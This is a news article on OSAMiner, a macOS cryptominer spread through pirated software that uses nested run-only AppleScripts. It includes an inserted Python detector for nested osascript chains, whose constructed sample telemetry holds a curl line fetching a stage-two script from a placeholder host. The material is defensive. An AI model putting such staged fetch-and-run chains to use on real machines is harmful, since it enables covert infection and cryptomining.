MacOS users have been the targets of a sophisticated malware operation for more than five years. The software used a cunning approach to evade detection and secretly mined cryptocurrency using the hardware of infected machines, without their owners' knowledge.
According to a report published this week by the security firm SentinelOne, the malware, named OSAMiner, has been distributed in the wild since at least 2015, disguised as pirated versions of games and software such as League of Legends and Microsoft Office for Mac.
A SentinelOne representative told ZDNet in an email interview on Monday that OSAMiner has been operational for a long time and has evolved over the past few months.
The spokesman added: “From the data we have it appears to be largely focused at Chinese/Asia-Pacific populations.”
Nested run-only AppleScripts
The cryptocurrency miner did not go entirely unnoticed, however. According to SentinelOne, two Chinese security companies discovered and analyzed older versions of OSAMiner in August and September 2018.
But according to Phil Stokes, a SentinelOne MacOS malware researcher, those reports only scratched the surface of what OSAMiner was capable of.
The main reason was that security researchers were unable to extract the malware's full code at the time, because the malware used nested run-only AppleScript files to retrieve its malicious code in successive stages.
While users installed the pirated software, the booby-trapped installers would download and run a run-only AppleScript. That script would then download and run a second run-only AppleScript, which in turn downloaded and executed a third run-only AppleScript as the final stage.
Analysis was made harder for security researchers by the fact that a “run-only” AppleScript is distributed in a compiled form whose source code is not human-readable.
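One way a defender can surface the staged pattern described above in endpoint telemetry is to look for process lineages in which the AppleScript runner appears more than once. The following is an added example, not code from the article or from SentinelOne; it assumes the scripts are launched via /usr/bin/osascript (the report as quoted here does not name the interpreter), and the log format and all sample events are constructed.

```python
"""Flag nested AppleScript execution chains in process-start telemetry.
Walks each process lineage and reports any in which the AppleScript runner appears
MIN_DEPTH or more times. Assumptions: scripts run via /usr/bin/osascript (the page
does not name the interpreter); the log format and sample values are constructed.
"""
MIN_DEPTH = 2  # two or more nested AppleScript runs in one lineage is suspicious
# Constructed sample telemetry, one process-start event per line: "pid ppid exe args..."
SAMPLE_EVENTS = [
    "100 1 /sbin/launchd",
    "200 100 /Applications/Installer.app/Contents/MacOS/Installer",
    "201 200 /usr/bin/osascript /tmp/stage1.scpt",
    "202 201 /usr/bin/curl -o /tmp/stage2.scpt http://example.invalid/s2",
    "203 201 /usr/bin/osascript /tmp/stage2.scpt",
    "204 203 /usr/bin/osascript /tmp/stage3.scpt",
    "300 100 /usr/bin/osascript /Users/alice/Library/Scripts/backup.scpt",  # benign
]

def parse_events(lines):
    """Return {pid: (ppid, argv)}; malformed lines are skipped rather than aborting."""
    procs = {}
    for line in lines:
        parts = line.split()
        if len(parts) >= 3:
            procs[int(parts[0])] = (int(parts[1]), parts[2:])
    return procs

def lineage(procs, pid):
    """argv of pid and of each ancestor, leaf first; `seen` guards against cyclic ppid data."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid, argv = procs[pid]
        chain.append(argv)
        pid = ppid
    return chain

def find_nested_applescript_chains(lines, min_depth=MIN_DEPTH):
    """Return {leaf_pid: [script paths, outermost first]} for suspicious lineages."""
    procs = parse_events(lines)
    parents = {ppid for ppid, _ in procs.values()}
    hits = {}
    for pid in procs:
        if pid in parents:
            continue  # a leaf's lineage already covers every ancestor above it
        scripts = [argv[1] if len(argv) > 1 else "<no script>"
                   for argv in lineage(procs, pid) if argv[0].endswith("/osascript")]
        if len(scripts) >= min_depth:
            hits[pid] = scripts[::-1]
    return hits
```

On the sample events only the installer-spawned chain (stage1 → stage2 → stage3) is reported; the single benign osascript run under launchd is not.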
Stokes revealed the complete chain of this attack, along with indicators of compromise (IOCs) for older and more recent OSAMiner attacks, in his post published yesterday. Stokes and the rest of the SentinelOne team hope that, with the mystery surrounding this campaign solved and IOCs published, other MacOS security vendors will now be able to detect OSAMiner attacks and help protect MacOS users.
“Run-only AppleScripts are fairly uncommon in the realm of MacOS malware, although this is likely due to the longevity of the MacOS as well as a lack of attention paid to it. The OSAMiner effort, which has most certainly been going on for at least five years, is a perfect example of how effective run-only AppleScripts can be for evasion and anti-analysis,” Stokes concluded in his report yesterday.
“In this case, we have not seen the actor use any of the more powerful features of AppleScript that we’ve discussed elsewhere [1, 2], but that is an attack vector that remains wide open and for which many defensive tools are not equipped to handle.”